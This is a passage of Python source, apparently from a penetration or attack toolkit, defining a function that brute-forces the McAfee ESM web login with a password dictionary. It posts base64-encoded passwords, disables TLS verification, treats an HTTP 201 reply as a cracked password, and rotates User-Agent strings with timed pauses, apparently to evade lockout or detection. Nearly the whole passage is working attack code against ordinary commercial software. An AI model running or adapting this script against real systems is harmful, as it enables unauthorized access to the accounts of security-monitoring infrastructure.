        globals.messages(8)
        file.close()
def mcafee_brute(ip, port):
    """Dictionary attack against the McAfee ESM REST login (/rs/esm/v2/login).

    Args:
        ip: target address.
        port: HTTPS port.

    For each line of dict.txt next to this module: send the /ess login
    preamble, then a JSON login with the password base64-encoded in the body;
    an HTTP 201 is taken as success. The user-name literal is redacted in this
    copy of the source; the report message names it as 'NGCP'. Outcome is
    reported via globals.messages; nothing is returned.
    """
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    # NOTE(review): this handle is never closed anywhere in the function.
    file = open(os.path.join(__location__, 'dict.txt'))
    bruteforcesuccesfull = 0  # set to 1 once a password is accepted
    https = "https://"  # local scheme prefix; other functions use globals.https
    # User-Agent strings selected by index `a`, advanced in the loop below.
    agents = [
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,'
        ' like Gecko) Chrome/79.0.3945.88 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/42.0',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,'
        ' like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41'
    ]
    a = 0
    for line in file:
        password = line.strip('\n\r')
        url1 = https + ip + ":" + str(port) + "/ess"
        url2 = https + ip + ":" + str(port) + "/rs/esm/v2/login"
        headers = {
            'Accept': 'application/json,text/plain,*/*',
            'DNT': '1',
            'Host': ip,
            'Origin': 'https://' + ip,
            'Referer': 'https://' + ip,
            'User-Agent': agents[a],
            'Content-Type': 'application/json;charset=utf-8',
            'Connection': 'keep - alive',
            'X-Xsrf-Token': 'null'
        }
        # base64 is an encoding, not protection; TLS is unverified (verify=False).
        params = {
            'username': '******',
            'password': str(base64.b64encode(password.encode('utf-8')), 'utf-8'),
            'locale': 'en_US',
            'os': "Linux x86_64"
        }
        json_params = json.dumps(params).encode('utf-8')
        try:
            # Opaque login preamble expected by the /ess endpoint; its format is
            # not documented in this file.
            response = requests.post(
                url1, data='Request=API%13CAC%5FLOGIN%13%14', headers=headers, verify=False)
            if response.status_code == 200:
                headers['Accept'] = 'application/json'
                response2 = requests.post(
                    url2, data=json_params, headers=headers, verify=False)
                if response2.status_code == 201:
                    globals.messages(7)
                    mess = ['NGCP', password]
                    globals.messages(9, mess)
                    bruteforcesuccesfull = 1
                    break
                else:
                    # After each rejected attempt move to the next User-Agent;
                    # after the fourth one pause for 360 s and start over.
                    if a <= 2:
                        a += 1
                    else:
                        time.sleep(360)
                        a = 0
        except Exception as e:
            logging.error(e, exc_info=True)
    if not bruteforcesuccesfull:
        globals.messages(8)